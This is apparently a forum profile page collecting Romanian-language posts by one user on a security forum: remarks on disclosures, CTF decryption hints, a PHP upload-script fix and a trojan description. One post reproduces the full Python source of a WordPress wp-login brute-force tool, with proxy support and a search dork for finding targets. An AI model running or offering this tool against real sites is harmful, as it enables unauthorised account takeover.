Jump to content

nedo

Active Members
  • Posts

    2065
  • Joined

  • Last visited

  • Days Won

    11

Posts posted by nedo

  1. A mai observat cineva ca aceste "disclosure"-uri sunt facute in zile ce se termina in 7? Adica 7, 17, 27... ? Ma refer la ultimele actiuni.

    sunt 2 la rand pe 17, ultimele 2, si 2 la rand pe 27. Cine stie o fi vreo legatura :))

    @petzy : probabil vrei sa spui de ce nu il angajeaza ca pentester. Firmele respective probabil au deja contracte cu alte firme pentru asa ceva. Nu o sa mai angajeze un om in plus.

    on topic, s-a cam legat de cei cu explorarea spatiului in ultima vreme, probabil se incapataneaza sa tina acele vulnerabilitati deschise si de aia ii verifica.

  2. Pentru un hint mai mare .

    Nu trebuie sa te uiti in sursa acelui programel .

    Te uiti la descriere sus cum se face criptarea / decriptarea

    70 is expanded to 70 00

    After the swap the result is: 07 00

    XOR with A5: A2 A5

    Deci "ca" ar fi

    63 - 63 00 = > 36 00 = > 93 A5

    61 - 61 00 = > 16 00 = > B3 A5

    Ce vedeti ca se tot repeta ? asa gasiti de unde incepe exact parola in log :)

    sper sa nu stric jocu :)

    Cred ca asta este un hint destul de mare. Trebuie sa decriptezi utilizandu-te de asta.

  3. pff, nu mai gasesc site-ul pe care am verificat eu. Ideea e ca pe ip-ul 74.125.224.148 care ti-l daca faci lookup pe google.com mai sunt hostate mai multe servicii. Tu trebuie sa gasesti unul din celelalte domenii.

    incearca aici cu ip-ul pe care ti-l dau ei, la chalange-ul meu mie mi-a dat ip-ul 74.125.87.103

  4. ^^ problema e ca DOAR SPUNE, nu face nimic in plus, si in plus multe chestii le exagereaza prea mult. A nu se considera ca tin cu Base, dupa parerea mea trebuie toti dati jos de acolo si pusi niste oameni responsabili. Sunt sigur ca in tara asta se gasesc 1000 de oameni responsabili si cu capul pe umeri sa poata sa faca ce trebuie pentru tara asta.

  5. chestia e ca ori

    a: site-ul este inca in construcite ca vad ca sunt aiurea multe chestii

    b: e facut foarte foarte prost, nu sunt ascunse directoarele, ai acces la scripturile js de pe site, la toate pozele, si probabil si la alte chestii dar nu am cautat.

  6. ai 2 else-uri aiurea


    else
    {
    redir('index.php?rs=ok');
    }

    si


    else
    {
    redir('index.php');
    }

    in plus ai o "}" aiurea pusa,

    incearca cu asta


    <?php
    include('utilities.php');

    $folder="data/images/";
    $foto=$folder.'file.txt';

    if ($_FILES['foto']['tmp_name'])
    {
    move_uploaded_file($_FILES['foto']['tmp_name'], "$foto");
    $allowedExtensions = array("txt","htm","html","xml");

    if ($file['tmp_name'] > '')
    {
    if (!in_array(end(explode(".",
    strtolower($file['name']))),
    $allowedExtensions))
    {
    die($file['name'].' is an invalid file type!<br/>');
    }
    }
    //mutam "}" de aici mai jos

    if ( $type!= "txt")
    {
    $_SESSION['error']='<p>Eroare. Incercati din nou.</p>';
    unlink($foto);
    redir('index.php');
    }
    else
    {
    redir('index.php?rs=ok');
    }
    } // aici
    else
    {
    redir('index.php');
    }
    ?>

  7. Face cam ce face orice troian, iti permite sa furi datele de la un anumit utilizator. Probabil iti permite sa faci si remote desktop/console, chestii din astea.

    Daca nu stii ce poate face un troian e mai bine sa te documentezi inainte sa umblii cu asa ceva pentru a nu te pune in pericol.

  8. bf-ul este probabil luat de aici

    codul bf-ului este urmatorul:


    #!/usr/bin/python
    #WordPress Brute Force (wp-login.php)

    #If cookies enabled brute force will not work (yet)
    #Change response on line 97 if needed. (language)

    #Dork: inurl:wp-login.php

    #http://www.darkc0de.com
    #d3hydr8[at]gmail[dot]com

    import urllib2, sys, re, urllib, httplib, socket

    print "\n d3hydr8[at]gmail[dot]com WordPressBF v1.0"
    print "----------------------------------------------"

    if len(sys.argv) not in [4,5,6,7]:
    print "Usage: ./wordpressbf.py <site> <user> <wordlist> <options>\n"
    print "\t -p/-proxy <host:port> : Add proxy support"
    print "\t -v/-verbose : Verbose Mode\n"
    sys.exit(1)

    for arg in sys.argv[1:]:
    if arg.lower() == "-p" or arg.lower() == "-proxy":
    proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
    if arg.lower() == "-v" or arg.lower() == "-verbose":
    verbose = 1

    try:
    if proxy:
    print "\n[+] Testing Proxy..."
    h2 = httplib.HTTPConnection(proxy)
    h2.connect()
    print "[+] Proxy:",proxy
    except(socket.timeout):
    print "\n[-] Proxy Timed Out"
    proxy = 0
    pass
    except(NameError):
    print "\n[-] Proxy Not Given"
    proxy = 0
    pass
    except:
    print "\n[-] Proxy Failed"
    proxy = 0
    pass

    try:
    if verbose == 1:
    print "[+] Verbose Mode On\n"
    except(NameError):
    print "[-] Verbose Mode Off\n"
    verbose = 0
    pass

    if sys.argv[1][:7] != "http://":
    host = "http://"+sys.argv[1]
    else:
    host = sys.argv[1]

    print "[+] BruteForcing:",host
    print "[+] User:",sys.argv[2]

    try:
    words = open(sys.argv[3], "r").readlines()
    print "[+] Words Loaded:",len(words),"\n"
    except(IOError):
    print "[-] Error: Check your wordlist path\n"
    sys.exit(1)

    for word in words:
    word = word.replace("\r","").replace("\n","")
    login_form_seq = [
    ('log', sys.argv[2]),
    ('pwd', word),
    ('rememberme', 'forever'),
    ('wp-submit', 'Login >>'),
    ('redirect_to', 'wp-admin/')]
    login_form_data = urllib.urlencode(login_form_seq)
    if proxy != 0:
    proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
    opener = urllib2.build_opener(proxy_handler)
    else:
    opener = urllib2.build_opener()
    try:
    site = opener.open(host, login_form_data).read()
    except(urllib2.URLError), msg:
    print msg
    site = ""
    pass

    if re.search("WordPress requires Cookies",site):
    print "[-] Failed: WordPress has cookies enabled\n"
    sys.exit(1)

    #Change this response if different. (language)
    if re.search("<strong>ERROR</strong>",site) and verbose == 1:
    print "[-] Login Failed:",word
    else:
    print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
    sys.exit(1)
    print "\n[-] Brute Complete\n"

    problema lui este in "urllib2.py".

×
×
  • Create New...